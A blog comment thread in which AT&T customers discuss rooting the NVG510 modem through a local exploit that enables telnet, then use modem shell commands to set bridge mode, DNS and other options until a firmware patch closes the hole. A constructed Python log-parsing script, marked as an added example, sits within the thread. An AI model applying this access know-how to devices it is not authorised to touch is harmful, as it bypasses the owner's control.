Motorola is pleased to provide the open source software used in the NVG510 device!

Please note that this project is for distributing, discussing, and supporting the open source software we release. This site does not provide any SDKs nor general purpose developer support for the NVG510.
http://sourceforge.net/motorola-home/nvg510/home/Home/
3/1/2013 10:27:00 PM
dick
wikidev?
http://www.wikidevi.com/wiki/Motorola_NVG510
3/1/2013 10:29:41 PM
Earlz
Interesting! This is much more source code than they gave out when I first took a look at their source code archives. Last I checked, they only had the "OSS" download available. They appear to leave out some crucial parts such as DSL and VoIP support.. but with what they've given, I'd expect a usable image for routing could be made. Only real problem is there is no documentation on how to reflash the modem other than that it uses CFE somehow
3/2/2013 3:47:20 AM
Anonymous
Great work.  Thanks!  I was able to log into the ssh server using "admin" and the device access code as the password.  I am running 9.0.6h2d21.  Since AT&T won't allow you to disable the DHCP server from the UI, I did it using the command line.  The DHCP server was giving me problems.  Even though we had it set to only give out 1 IP address, the other boxes using another DHCP server on the network would mysteriously end up with att.net as a domain search suffix and the router as the DNS server.  Hopefully this will solve the problem.
3/6/2013 11:20:47 PM
Anonymous
If I go through with logging in > magic > ! > nsh I can't do anything.   However, if I just type magic it is already at the nsh prompt, and I have configured upnp and google's dns servers to be working after reboots and everything. There is no apply command though, but after validate and save it seems to apply.
3/9/2013 7:59:33 PM
Modified10Real newbie
@Earlz or who can help. Thank you all for the information here!
Help with #nine and any other useful information for a real newbie would be greatly appreciated.

quote 9. Now you should be able to login to the modem with telnet.
The username is admin and the password is your modem's "access code" that should be written on it.

I can't figure out how to access telnet on Mac. I go to terminal-new connection, choose remote login (telnet), then I add http://192.168.1.254/cgi-bin/etherlan.ha to server-side box, says server is found & I click connect and get back a message that says this:

 http://192.168.1.254/cgi-bin/etherlan.ha: nodename nor servname provided,
 or not known
[Process completed]
I can't get past this part. Thanks for any help.

ATT always for the shareholders not the customers
and their new plans for expansion are indescribable.
3/10/2013 6:32:45 AM
Modified10Real newbie
figured it out lol 
3/11/2013 1:07:29 AM
DT
Thanks for the info, Earlz!
I am having a problem where I can put the router in true bridge mode, but it reverts back to non-bridged mode after a few days. Telnet still works, I just have to redo the commands. Have you or anyone else noticed this? Is there any fix? I am doing both save and apply.
3/15/2013 9:39:43 AM
DT
Nevermind I figured it out. My router was on port 4 instead of 1, doh! What ends up happening is that if you put your router on another port after putting it in true bridge mode, it detects the router and overwrites your changes. I've turned off the DHCP server in the modem to prevent this in the future, should I inadvertently use the wrong port again.
3/18/2013 2:49:05 AM
mattkilla
So just to clarify, turning on telnet does what? And true bridge mode would be beneficial to whom? I'm trying to tweak my modem to allow a higher access speed to each individual device. I never get close to what I pay for. Was just wondering if someone could explain these few things in layman's terms
3/25/2013 12:24:58 AM
Earlz
@Mattkilla this WILL NOT help. If you're getting a crappy connection speed, 99% of the time it's AT&T and its infrastructure's fault. (for instance, paper wrapped wires that were first installed in the 40s is not going to be capable of a good connection)
3/25/2013 2:23:13 PM
Anonymous
Hey Earlz,
What's the best way to turn the nvg510 into a switch? I managed to do it by disabling the dhcp server and giving it an ip address outside of the main router's ip range. Is this enough? Should I disable the firewall and is it possible to disable the broadband light? It keeps flashing red. Thank you for all your time and work on this project, take care.
4/11/2013 6:25:49 AM
d0tmatrix
Thank you for the information! I was able to follow your directions to enable true bridge mode, but now I can't seem to figure out how to use my static public IP addresses assigned by AT&T. I am currently using DD-WRT on my router. If I enable the router to use DHCP to configure its IP, it is assigned a random public IP. I can use a traceroute to get my gateway IP. If I use this gateway IP and my private IP I was assigned, nothing works. If I connect the router to LAN 2- LAN 4 and use DHCP in DD-WRT I get a private IP from the NVG510 and everything works. I was assigned 4 static IP addresses. I can't seem to get Uverse Tech support to help me understand how my static IP works. 
4/12/2013 12:29:37 AM
Earlz
@dotmatrix Yea.... I have no idea? I would think it should *just* work if you manually configure your router behind bridge mode to use the static IPs. you might make sure your gateway and netmask is correct. I remember having some problem at some point with AT&T handing out a gateway which fell outside of the netmask, thus requiring me to manually override the netmask. 

Not sure if that applies in this case though unfortunately. I've never had experience with their static IP support
4/12/2013 4:42:56 AM
Anonymous
I am interested in anyone's results with Static IP also.
I would love to use true bridge mode with this thing as I use PfSense but can't afford too much down time for trial and error.
Also do we have any way to make it ignore any firmware upgrades? My worry is we set this thing up, get it working great finally and a firmware upgrade jacks it up and locks telnet out but for now static IP true bridge would be great!
4/12/2013 4:30:07 PM
Anonymous
Thanks for the great work, I FINALLY got rid of the stupid redirect!

For those of you with modems on a different default ip (like me) here's what I did:
Copy the source code out of the page that enables telnet. Save, change the ipaddress, then launch the page. 
Maybe for future users, the page can be modified so that a user can enter the ip as a field as well.

4/18/2013 2:42:03 AM
Levi
@Earlz how do I connect using telnet?
4/22/2013 2:08:43 AM
Levi
@Earlz I enabled telnet on my PC but I can't seem to figure out how to connect to my router using telnet. Can someone help?
4/22/2013 2:20:35 AM
Levi
Never mind, I got connected, but how do I enable upnp?
4/22/2013 2:54:50 AM
Levi
When I type in the upnp or redirect code it simply says "usge: set OBJ.ITEM VALUE" WHY!!
4/22/2013 11:27:16 PM
Earlz
@Levi You have to get to `nsh` first. See the section surrounding the "fixing common problems" header
4/23/2013 4:43:12 AM
Levi
I have already done nsh. After that it shows up as axis something(not at my computer) but for  I can not change anything
4/24/2013 1:17:35 AM
Anonymous
Thanks for the tutorial, though my problem seems different than anyone else's.  What happens for me is the redirect, but only when browsing with the http port.  If I go to http://google.com, it redirects.  When I go to https://google.com, it works.  Yahoo messenger works, my gmail notifier works, but all websites will start redirecting when using port 80.  I've shut off the redirect per the tutorial above, but that just makes it redirect to 192.168.1.254 when having its "issues."  The only workaround I have is using a public proxy server when it's acting up.
4/30/2013 3:19:54 PM
JFH
Dude, I seriously need to send you some cash for this.
I have been fighting with AT&T 'support' for over a month to get rid of that stupid connection 'error' redirect message. This is what I wanted. I just did it - rooted the blasted thing - now but confident this will address the issue. Also disabled that worthless DHCP server they have on the unit.
4/30/2013 10:01:31 PM
Anonymous
I have a problem that I can't seem to work around and wondered if you can help.
I have put the modem in pass-through (needed it for work, and AT&T didn't give a crap; so, I hacked it!)
But, now, my phone doesn't work.  My phone uses the modem for the "dial tone" (at least, that's what the tech told me).
It seems that forwarding everything to my internal router has disabled the phone line.  I thought I could get it
to work by putting vc-1 into the list of ports on link[2].  But, sadly, that does not work.  Any suggestions?
5/23/2013 2:13:25 AM
Earlz
With the way bridge mode is setup, maybe, maybe not. If you bridged it, you might try running an *extra* network cable from your router to your modem (use one of the non-bridge ports). I'm not sure it'd work though and it'd probably require some extra configuration. I didn't have an NVG510 which supported VoIP, so I don't know. 
5/23/2013 1:30:25 PM
sunnymat
Hello Earlz, this is really a great work. This has been very helpful in getting into this modem but I haven't been able to get it to work the way I wanted it to. Can you let me know if this is possible - I switched to cable recently and have no use for this modem now, so I was trying to set it up as a wireless access point with a LAN port plugged in directly to the back of my cable modem/router. I tried the true bridge mode you have mentioned above except I removed the ppp since I do not want that to happen, but that doesn't seem to work. Can you let me know if I am missing something or this will not work?
5/24/2013 1:18:41 PM
Earlz
@Sunny I tried that exact thing, since the NVG510 is wireless N and my current wifi is wireless G. Just give up. I managed to get it to work, but I had to reset it once an hour or the wireless signal would become so weak as to be non-existent, apparently some kind of power saving feature I couldn't figure out how to disable. 

See also: http://earlz.net/view/2012/12/28/0230/how-to-reuse-an-nvg510
5/24/2013 5:01:17 PM
Tom
I'm having trouble. When I submit the form on your exploit page it takes me to a blank page. if I load http://192.168.1.254/cgi-bin/etherlan.ha directly it says 404 not found.
6/4/2013 1:33:17 AM
Nate
Thanks for posting this. I have been having a problem with intermittently slow connections and disconnects. I used your pass through setup and my internet works better than ever. I do have one question: the modem is working fine, all diagnostics say pass, but the broadband light blinks red? This was happening last night after I restarted the gateway for being slow. AT&T did a line test and said everything is fine. That's why I landed here to root the modem. Any suggestions other than the true bridge mode?
6/6/2013 2:00:02 PM
Jice
This appears to open up telnet both internally to your network as well as externally.  Couple of questions:

1) Is it possible to configure to only allow telnet from within your network?
2) If/when accessing telnet externally, are passwords always sent encrypted?

Thanks,
Jice

6/9/2013 5:15:39 PM
Earlz
@Jice ick! On my modem, it only turned it on to the LAN by default(though there was an option to turn it onto WAN as well). I recommend after getting into the modem turning ssh on and telnet off in that case.. and look for an option to turn WAN access to it off, if possible. 
6/10/2013 3:36:06 AM
Jice
@earlz Sorry. I think that I confused myself.  I used my public IP address from within my network and was greeted by a telnet prompt, so I assumed it was publicly accessible.  But, I tried from an outside machine, and did not get a telnet prompt.

6/11/2013 4:39:02 AM
Anonymous
First of all THANKS for putting this together. It's awesome. However, I'm still fighting a problem and hope someone can help. I have 2 Xbox 360s using the same NVG510. I followed the procedure to enable Upnp but both Xbox NATs are Moderate instead of Open. I went back in and verified that Upnp is still enabled and it is. Anyone have ideas?
6/14/2013 10:59:03 PM
Earlz
It's impossible to have 2 Xboxes have an open NAT type. The best you'll be able to do is one open and one moderate, unless you pay AT&T for an extra IP address. This is inherent in how the internet works. To get one to be open, you'll have to forward port 3074 (UDP and TCP) and port 88 (UDP) to the Xbox's IP address.
6/15/2013 12:55:42 AM
The_NetZ
Hey, me again. closer and closer to a decent machine, lol. My current question regards power management for the wifi device. Normally under linux you can issue some iwconfig commands to enable/disable power management, and hopefully boost signal strength with that. However, during my last telnet session with a root shell it seems this is one of the "lacking" linux/unix utils you make mention of (why people feel the need to gut the awesome power of linux I don't understand [or perhaps I do and just don't want to really hate them for it]). is there an nsh or other command available to do the same?
7/3/2013 12:56:08 PM
Earlz
@Netz, yea they don't include iwconfig. Broadcom ships a proprietary (and very hard to use) utility called `wl`. You might try searching for some info about it, and I believe it does respond to `--help`. I was messing with something unrelated to power levels, but noticed that the help page mentioned power levels along with a big huge "adjusting this may cause your device to be illegal according to the FCC and/or fry your wireless chip" kind of warning. If you're going to adjust power levels, ensure you take small steps to ensure you don't overheat the chipset
7/3/2013 3:11:34 PM
The_NetZ
Yeah, I'm looking into that. I want to do as best as I can with it, within legal limits. I'm trying to set the google public dns server (8.8.8.8 & 8.8.4.4) but at the save step it keeps telling me "The database is dirty", which is really getting to irritate me XD. Any ideas what is wrong here?
7/5/2013 3:15:58 AM
The_NetZ
Actually nevermind, lol. I got the dns setup right, but have you had a look at busybox on this machine? could do some interesting things with that...
7/5/2013 4:35:34 AM
The_NetZ
And my third comment tonight XD, but I think you want to hear this, as I've figured out how to ssh into the NVG510
It's actually so simple I don't see how you didn't figure it out yourself, considering how much you did, lol. From tilda (my favourite terminal emulator) I ran:
ssh admin@nvg510 
and gave it my admin password, and boom! I'm in, and 192.168.1.254/cgi-bin/logs.ha shows
"2013-07-05T00:54:33-05:00 L4 cshell[2995]: TS: "admin" completed login via SSH from 3232236002"
Note: I added the nvg510 to /etc/hosts to make telnet easier as I can tab complete the hostname nvg510 instead of manually typing the ip.
7/5/2013 6:02:31 AM
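The source field in the logs.ha line quoted in the comment above (3232236002) is an IPv4 address written as a decimal integer. As an added example (not part of the original thread and not the modem's own code), this Python script parses lines of that shape, decodes the address, and flags shell logins that did not come from the LAN. It assumes the integer is in network byte order, that the LAN is the default 192.168.1.0/24, and that other logins follow the same line shape; every sample line except the first is constructed.

```python
import ipaddress
import re
from typing import List, NamedTuple, Optional

# Assumption: factory-default LAN. The page gives 192.168.1.254 as the
# modem's address; the /24 mask is assumed. Change it if you renumbered.
LAN = ipaddress.ip_network("192.168.1.0/24")

# Line shape taken from the single log line quoted in the comment above.
LOGIN_RE = re.compile(
    r'^(?P<ts>\S+)\s+L\d+\s+cshell\[\d+\]:\s+TS:\s+"(?P<user>[^"]*)"\s+'
    r'completed login via (?P<proto>\S+) from (?P<src>\d+)\s*$'
)


class Login(NamedTuple):
    timestamp: str
    user: str
    proto: str
    source: ipaddress.IPv4Address
    on_lan: bool


def parse_login(line: str) -> Optional[Login]:
    """Return a Login for a 'completed login' line, or None for anything else."""
    m = LOGIN_RE.match(line.strip())
    if m is None:
        return None
    value = int(m.group("src"))
    if value > 0xFFFFFFFF:  # not a 32-bit value, so not an IPv4 address
        return None
    # Assumption: the integer is the address in network (big-endian) order.
    src = ipaddress.IPv4Address(value)
    return Login(m.group("ts"), m.group("user"), m.group("proto"), src, src in LAN)


def off_lan_logins(lines: List[str]) -> List[Login]:
    """Logins whose source address is outside the LAN subnet."""
    parsed = (parse_login(line) for line in lines)
    return [login for login in parsed if login is not None and not login.on_lan]


def _constructed(ts: str, proto: str, addr: str) -> str:
    """Build a constructed sample line in the same shape as the quoted one."""
    n = int(ipaddress.IPv4Address(addr))
    return f'{ts} L4 cshell[3001]: TS: "admin" completed login via {proto} from {n}'


SAMPLE_LOG = [
    # The line quoted in the comment above, verbatim.
    '2013-07-05T00:54:33-05:00 L4 cshell[2995]: TS: "admin" completed login via SSH from 3232236002',
    # Constructed lines below: the same shape is assumed, not confirmed.
    _constructed("2013-07-05T01:10:02-05:00", "Telnet", "192.168.1.64"),
    _constructed("2013-07-05T03:41:17-05:00", "SSH", "203.0.113.7"),  # documentation range
    "2013-07-05T03:45:00-05:00 L4 example[1]: constructed line that is not a login",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        login = parse_login(line)
        if login is None:
            continue
        flag = "LAN" if login.on_lan else "OFF-LAN"
        print(f"{login.timestamp} {login.user} {login.proto:<6} {login.source} {flag}")
```

A login flagged OFF-LAN means the shell answered a client outside your subnet, which is the WAN-exposure case raised elsewhere in this thread.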
Ryan8431
I've been having problems similar to this link: https://discussions.apple.com/thread/2328853?start=0&tstart=0
Behind my NVG510 I have a D-Link router with various devices connected...PCs, PS3s, iPhones, iPads, Printers, etc.
ONLY when opening a browser from a secondary computer, the NVG510 loses sync.
The only way I can get it to sync afterwards, is plug my primary PC directly to the NVG510 and reset connections.
My primary PC is also the one whose MAC I have my router set to clone, and the same MAC defined in the NVG510 for Passthrough. Then I connect my router back up and everything is fine, until I try to open a browser from the secondary computer again...
Any thoughts?
7/5/2013 8:25:37 AM
David T.
Even with NVG510 switched to true bridge mode and my router handling everything, AT&T is sh*t... it boils down to four things:
1) They do some very proprietary management stuff with the NVG510 as far as DHCP leases and network provisioning. In true bridge mode the typical router doesn't have a clue how to handle it and the connection just goes south. A renew/release on the router and possibly a reboot of the NVG510 is necessary once a month to correct this kind of issue.
2) Especially with naked DSL, you are trying to pull 6, 10, 12Mbps over the standard telephone wiring in your house... this is a basic flaw with U-Verse, as standard telephone wiring was never designed to handle those speeds. It's why twisted pair cabling was developed. AT&T will give you twisted pair from the pole to your house, and a twisted pair cable from the modem to the wall plug, but won't replace the internal run except as a last resort.
3) U-Verse is very sensitive... minor issues in the transmission lines or at the CO will send y
7/7/2013 4:53:46 PM
David T.
3) U-Verse is very sensitive... minor issues in the transmission lines or at the CO will send your speeds into the tank. Every few months my speeds take a dump and I have to call up and get service... they always send an inside tech first which is useless (because I know my setup is fine) and then I have to wait for an outside tech to be dispatched. If I am lucky, the outside tech can fix the problem, if I am not lucky, the outside tech has to escalate even further meaning more delays...
4) This means every few months when I call AT&T, the first level tech wants to run diags, and invariably tells me that they can't find my modem (because I have it in true bridge mode) so I have to do a full reset and leave it factory defaults until the issue is fully resolved (or the rest of the techs are going to be like, "hey, your modem isn't responding...) Then I have to go back and reconfigure the modem afterwards each time back into true bridge mode.
--For people who are like, "why do you need true bridge mode?" 1) Do
7/7/2013 4:54:20 PM
David T.
--For people who are like, "why do you need true bridge mode?" 1) Double NAT is never an efficient way of setting up a network, and 2) I am absolutely unable to do SSL tunneling unless I put the NVG510 in true bridge mode.
7/7/2013 4:54:39 PM
JDS7801
I'm late to this game but I am happy to report that my UVERSE via NVG510 is now usable as a primary link to the Internet. I still cannot believe that AT&T never updated their software to eliminate the "Potential Connection  Issue" caching problem. It must have cost them thousands of dollars in support calls. Thanks for helping us fix a bug that they were unwilling to address. I address the DNS problem by putting hard DNS addresses in every machine that connects through the NVG510. Earlz you are the Man!!!
7/9/2013 3:48:12 PM
Matt
Here are the commands I used to change the DNS:
set ip dns primary-address 8.8.8.8
set ip dns secondary-address 8.8.4.4
set ip dns proxy-enable off
validate
apply
save
7/11/2013 6:16:36 PM
mroboto
I ran your code on the 510, and got telnet access (finally!). After poking around a few, I tried "configure", and got access to the configuration prompt. I used " set ip dns primary-address x.x.x.x ", and got the shell prompt, no error.
exiting, I was asked to save, hit " y ", and checked the modem status. DNS CHANGED! SUCCESS! THANKS A MILLION!
7/14/2013 8:25:44 AM
BellTech
Thank you, thank you, THANK YOU for all of the hard work and hacking you have put into the NVG510! The resolution of the LAN IP redirect issue has been a godsend for many irritated customers of mine. Couple that with a true bridge mode config that is not affected by an RG hard reset (customers love mashing recessed buttons) and my life at work has become much easier. Thank you again, sir. 
8/1/2013 4:31:03 PM
Earlz
@BellTech I was told there was some internal documentation now at AT&T to use my website, basically. I think that's pretty awesome. I never expected AT&T themselves would take an interest in this site(although I'll always provide all this information free and with no strings attached). 
If it's not confidential (I'd like to show it to others), is there any way you could send me a PDF or some such of it? I'm very curious as to what exactly they're instructing.
8/2/2013 2:28:16 PM
bdc-devel
Quick question, I got "True bridge mode" setup and all is fine, I also have an ipv6 enabled line ... while IPv6 works fine when connected to port 2, the NVG510 refuses to send the ipv6 info to my router on port 1 ... any suggestions ?
8/8/2013 9:04:45 AM
Earlz
@bdc this is because AT&T's IPv6 support isn't "native". They tunnel the IPv6 through IPv4 with software. So, when you do true bridge mode, you lose that feature. Difficulty of setup ranges from impossible to easy, depending on your router behind it. Look up IPv6 tunneling. Here is one I found quickly: https://www.sixxs.net/main/
8/8/2013 1:53:41 PM
bdc-devel
Ah yeah, I have a ZyXel NBG4615 behind, will look it up, thanks!
8/8/2013 4:00:05 PM
Anonymous
Is it possible to change the modem's MAC address through root? 
8/13/2013 3:37:02 AM
Earlz
@Anon yes, it's possible to change the Mac Address. It's quite risky though and I'm not sure if it's reversible. Get to the `nsh` shell and then I think `mfg mac-info <MACADDRESS>` should work. Messing with the mfg command though is very dangerous and not reversible by factory reset. I can't guarantee it won't brick your modem
8/13/2013 5:39:34 AM
Anonymous
@Earlz

Thanks for the info, the reason I want to change my MAC address is because I am thinking that would give me a new IP address. I have had same u-verse IP forever... I've tried everything to change it to no avail.
8/13/2013 8:53:16 PM
Anonymous
@Earlz

Is it possible to brick the modem just by changing one number in the MAC address? I'm kinda scared to do it.
8/15/2013 8:25:38 PM
Anonymous
I changed the modem's MAC Address through the root, and it did not issue me a new external IP.
8/16/2013 12:36:14 AM
Anonymous
You can't change your IP address with UVerse. Think of UVerse as working like a really big LAN and you have not a static, but a "DHCP reservation" whereas you are identified by your MAC address and then always assigned the same IP. So you maybe could technically get a different IP by changing your MAC but it would likely end your service as your MAC is tied to your account and if you were to change your MAC back again, you would get the same address again.
8/21/2013 5:50:34 AM
Anonymous
I enabled true bridge mode and I assume it is working as my router now displays a WAN ip and gateway, but I can't figure out now how to access the modem when behind the router? Previously I was using the passthrough method with a pinhole so I could access my modem and router both via "pinhole" by having each on different class c subnet with /16 mask, this doesn't seem to work after putting modem in true passthrough. Ideas?
8/21/2013 6:39:42 AM
Anonymous
The easiest way to access the modem when behind a router and bridged is to hook one of the NON-BRIDGE ethernet ports from your modem to your router.. So, you'd have 2 ethernet cables between your modem and router. With this method, your router would have a WAN IP and a LAN IP of (say) 192.168.2.1 and your Modem would then have no WAN IP, and have a LAN IP of 192.168.1.254.. The only thing to be wary of is that you want to ensure that your router is handing out IP addresses through DHCP and not your modem.. This may require disabling the modem's DHCP server
8/21/2013 2:00:03 PM
Phillip T.
I have the NVG510 uverse setup, but I also have my at&t VOIP configured through this as well, and was curious if anyone has bridged this nvg510 and lost the VOIP?  I really want to do this, but I also need to keep my VOIP service going.  I have already hacked and ssh'd into the nvg to change the primary, and secondary dns, and my voip was not affected.  I was a little paranoid to do the complete bridge until I heard from someone else with my same setup.

Thanks for sharing this hack!  
8/23/2013 12:29:47 AM
Earlz
If you do bridge mode with VOIP, I'm 99% sure you'll lose VOIP service.. You can try it, but be ready to do a factory reset if you lose service
8/23/2013 4:47:35 AM
Phillip T
I suppose I will just try to work with the IP Passthrough...cause I want to implement my pfsense
box into the mix....  Perhaps switching over to UVerse wasn't such a grand plan after all :(

Thanks.
8/23/2013 12:05:10 PM
Anonymous
After telnet I am able to set variables, but validate, apply and save commands are missing:
# validate
/bin/sh: validate: not found
# apply
/bin/sh: apply: not found
# save
/bin/sh: save: not found
9/6/2013 2:52:22 AM
Anonymous
Nevermind. Didn't see the 'nsh' line
9/6/2013 2:57:05 AM
Nick
Earlz, you are awesome. This fixed all of my issues except for the fact that my connection is super slow. Thanks!
9/6/2013 4:33:46 AM
Pedro
Earlz, you have saved me hours of headaches!  The NVG510 has been a piece of junk since the day AT&T gave it to me.  I'm on my 3rd one--they keep thinking it's hardware when I know the problem is software.  I used to have DSL Extreme with a bridged 2Wire modem of some kind and will go back to them as soon as my low price with AT&T is over.

I'm a relative novice (not sure what "nsh" means) but I found your instructions easy to follow -- I had never used Telnet before.  Now I have put my trusty Netgear router (which has 3,586 more features) back in play.

One possibly dumb question: by enabling Telnet via "set mgmt.shell.telnet-port 23", have I opened up my modem to the world?  Should I disable it by entering "set mgmt.shell.telnet-port 0"?

Finally, http://tuxhelp.org/doku.php%3Fid=networking:taming_nvg510.html says that bridge mode is enabled via "set link[2].port-vlan.ports "vc-1 lan-1"" which is slightly different than your command.  Is there a functional difference?

Thanks again for saving my san
9/9/2013 7:35:39 PM
Uncommonly common uncommon name
This is very helpful, thank you. 
It is worth noting that my name is levi
9/10/2013 4:55:05 AM
Earlz
@Pedro, no you haven't opened up telnet to the world, only to your local network. 
9/10/2013 5:07:08 PM
Hurtzdoenut
@ Earlz

This is probably irrelevant by now but I just found this thread. Kudos for the info btw. I read earlier that you tried to use the NVG510 as a wifi connection due to your other only being a G standard. You also mentioned the reason you quit using it was due to its "power saver mode" or whatever was bogging the signal. Have you tried to manipulate the "phy.wl80211.wmm.powersave"? It has an on/off switch.

Just curious.
9/11/2013 8:24:41 AM
Hurtzdoenut
For Windows 8 users,

You may have to install the telnet service before you can try any of this. To do so, right-click on the bottom left of your screen (where you access your start menu) and click "Programs and Features" (or do so by going through control panel). On your left hand side you will see "Turn Windows features on or off". Click on that and scroll down until you see a check box that says "Telnet Client". Check that box and click OK. Wah Lah!!! You can now access telnet through your command prompt. Telnet, by default, is not installed in Windows 8 for security purposes.
9/11/2013 8:34:20 AM
Anonymous
@Pedro
The "set link[2].port-vlan.ports "vc-1 lan-1" shouldn't be any different than the one described in this thread (In theory). If you notice, link[1] supports more than one port. I would imagine link[2] should have the same functionality as vc-1 is only a virtual port.

Also I would like to note that the website mentioned references this blog for its information.

References

    http://lastyearswishes.com/blog/view/4fcc69bc4aa5d8385420c705
    http://lastyearswishes.com/blog/view/4fcff51b4aa5d8385420c706

9/11/2013 8:57:15 AM
Anonymous
@Anon btw lastyearswishes.com is the old domain name of this blog. 
9/11/2013 3:31:14 PM
Anonymous
^^^ I was only pointing out that the websites pedro listed had links to this blog.
9/11/2013 6:29:47 PM
Anonymous
i get 404 when i click save after inputting the nonce value
9/12/2013 11:24:02 PM
Earlz
Are you sure your modem is actually at 192.168.1.254? 
9/13/2013 1:51:31 PM
Kal
Once the modem is bridged, is the concurrent session restriction removed? I am purchasing one as I think that is the trouble that I am having at my school with my 3801.
9/14/2013 9:15:43 PM
Earlz
@Kal, yes it should be removed assuming that your router behind it is capable of handling enough concurrent sessions. Note this is only for the NVG510 though
9/15/2013 2:00:50 AM
Mongo
Enabling True Bridge mode does kill the VOIP service on my NVG510 (at least if that's the only thing you change).  If anybody has any clues for making VOIP work in True Bridge mode, I would be pleased to experiment and report results.  So far, I have not found any objects that appear to be VOIP related from the nsh shell.  However surely there must be something that causes it to get enabled and disabled?  Might serve as a starting point?
 
9/15/2013 9:44:43 PM
Earlz
I am almost for sure that it's flat out impossible to use VoIP with true bridge mode. True bridge mode basically takes the modem out of the traditional network. As far as the modem can go, it doesn't have an internet connection
9/16/2013 12:56:08 AM
Captain Red Beard
I have 2 work computers in the house: mine and my roommate's. We both use Cisco VPN to access our employers' networks. Both worked fine when I had ATT DSL and used the 2Wire gateway. Now that I have switched to U-Verse internet and have the NVG510 gateway, my work computer connects via VPN, but my roommate's does NOT. Tried a custom NAT/Gaming setting and an IP Passthrough and nothing works. Is there a root fix that I can employ to fix this problem? All other computers, eReaders, smart phones, and wireless printer connect with no problem.
9/19/2013 10:43:28 PM
Earlz
Yea, I'm not really familiar with Cisco VPN, so I don't know how it works. I'm not for sure what would be wrong with it
9/20/2013 2:54:03 PM
Anonymous
Hi I rooted the nvg510 and put it in true bridge mode. I added a Linksys e2500 router and set the DNS for openDNS. Everything has been working as it should for the last few days, but the last week I have been struggling again. My problem is the fact that nvg510 seems to still disconnect and reconnect like it did before I rooted it. The reason I think it's the nvg510 is I will go into the room and look at the lights on the device, the broadband light will be blinking while the service light is red. Then it seems to reset itself after a few mins and then continues. What could be cause of this?
10/10/2013 6:03:34 AM
Earlz
@Anonymous. It sounds like you have either a line or hardware problem. I'd do a factory reset of your modem and then call AT&T about it. (do the factory reset so that AT&T doesn't blame your custom configuration as being the problem) 
10/10/2013 2:03:33 PM
Kevin
Hi I would like to use NVG510 as wireless access and turn-off the WAN port? Will this work: set link[2].port-vlan.ports off
10/15/2013 1:36:12 PM
Kevin
The flashing red LED is very annoying to my wife.. lol :)
10/15/2013 1:37:58 PM
Earlz
@Kevin I would consider a piece of electrical tape over the LED :) 

You might run into problems using it as a wireless access point, but not using its WAN. It will enter a terrible power saving mode or something and drop connections

http://earlz.net/view/2012/12/28/0230/how-to-reuse-an-nvg510
10/15/2013 1:50:19 PM
Anonymous
LOL.. Love that link! I already thought about putting tape over the LED. Actually it's been working great as an access point with exception to the annoying LED and redirect.enable hijacking my browser because of no connection to the WAN port. I turned-off the redirect.enable using your instructions and Hyper Terminal...
10/15/2013 2:49:22 PM
LECE73
Hi is there a way to run this when the router is configured for a network 192.168.0.1 ? We have a bunch of servers running on that network and changing it will be a mess and I need to change the DNS servers on the router.

Thank you very much!

Luis
10/18/2013 1:46:56 AM
Earlz
@LECE73, yes. Download the HTML page, and then open the file in a text editor and do a search and replace for 192.168.1.1 and 192.168.0.1 (or whatever the desired IP is). If that sounds too complicated, you could also try my Android application that makes it easier if you prefer not to mess with the technical details http://earlz.net/view/2013/08/03/2006/nvg510-fixer-an-android-application
10/18/2013 1:45:39 PM
Sonny
@Earlz, For someone who has Att DSL ppoe service and not Uverse. Do you think it may be possible to use a NVG510 as an ATA for VOIP behind an Att 3600 or Westell E90-6100 modem?
Do you know if it's possible to configure one of the NVG510's Lan ports to be a WAN port.   
10/20/2013 5:05:21 PM
lowdrag
2 questions I have not seen yet addressed? (blind?) 
1 How do you save the config?
2 if needed, how do you upload a saved config.
I don't want to have to go through redoing all the settings if this gets wiped or a new box is needed.
Thanks,
10/21/2013 3:17:27 AM
Earlz
@Sonny, ooh. That's an interesting idea. It may be possible to. You'd have to browse the configuration options and try stuff yourself though. Look at the pastebin of the configuration options I posted and search for "ppoe" for ideas. I've never tried anything like it before, but it might be possible. 
And for the LAN as WAN, yea that's what true-bridge mode is. 

@lowdrag I don't believe it's possible to save or directly load the configuration settings to a file. 
10/21/2013 6:07:23 AM
McBill
Thank you Earlz.  I was about ready to throw my modem in the trash because of that stupid redirect issue.
10/23/2013 4:41:37 AM
Hitek146
I have NVG510s that either have a blown DSL port, and others that have been de-registered by AT&T that still work as access points.  I have used similar tricks with older Cisco VoIP routers that had only one ethernet port, so I used VLANs with a VLAN compatible switch to break out the WAN and LAN ports, using the single ethernet ported device as a router.  I know bandwidth would be reduced using one ethernet port for both ingoing and outgoing traffic, but it worked well to utilize an otherwise outdated and worthless device.  I read all of the above comments hoping to find someone that wanted to use this modem as a normal wired router, and based upon my experience, it appeared to me that the exact configuration I would need would be your bridging example, while disabling the DSL interface, and plugging an internet connection into the LAN1 port.  From the above comments, though, it appears as if this configuration breaks NAT to the LAN ports, but maybe that is only because the DSL interface hasn't been dis
10/24/2013 4:25:12 AM
Earlz
Yea, that would break the firewall. It would function as a dumb switch in that situation. It might be possible to use it as a router with NAT and firewall through an ethernet port, but I have never tried that configuration
10/24/2013 4:51:10 AM
Jeff
It looks like AT&T just did a firmware update (9.0.6h2d30) and this trick suddenly stopped working. The bold red text on the response page that said "Changes Saved" now says "Message Format Error."

But I notice there is now an HTTP server running on 192.168.1.254 port 7547 but it just returns "401 Unauthorized." No idea what the username and password is, I tried "admin" and the access code but that doesn't work.

Oh, well - it was fun while it lasted!


10/29/2013 11:07:49 PM
Earlz
Oh no :( What region are you in? 
10/30/2013 6:23:28 AM
Anonymous
TX Gulf Coast
10/30/2013 7:19:33 AM
Different Sonny
I also just ran into Jeff's problem. Net went down yesterday. Checked everything on my end, figured ATT rep would tell me to reset everything so I did it before I called. Then I called and found out it was just an outage in the area. Tried rooting it again and am running into this wall. Also southwest Texas.
10/30/2013 7:10:56 PM
Anonymous Tier 2 Agent
Yes, Looks like the vulnerability was found and patched with yesterday's firmware push.

Getting "message format error" when attempting to enable telnet.
10/30/2013 8:40:44 PM
Earlz
I'm still in shock that AT&T would kill our mutually beneficial relationship (by patching a local-only exploit), while not actually fixing the problems that end users are having with their modem. 
10/30/2013 8:52:42 PM
Jeff
Hey, at least it's good to know that AT&T didn't single me out for a firmware upgrade :-o

I found some discussion of the port 7547 thing here:
  http://www.dslreports.com/forum/r28663263-NVG589-next-ATT-U-Verse-firmware-opportunities

Someone on that forum claims the username will be the device's serial number and the password is stored in the config under "mgmt.cwmp.cr-password" but that doesn't help much if you can't access the config database to begin with :-(
10/31/2013 6:25:25 AM
Earlz
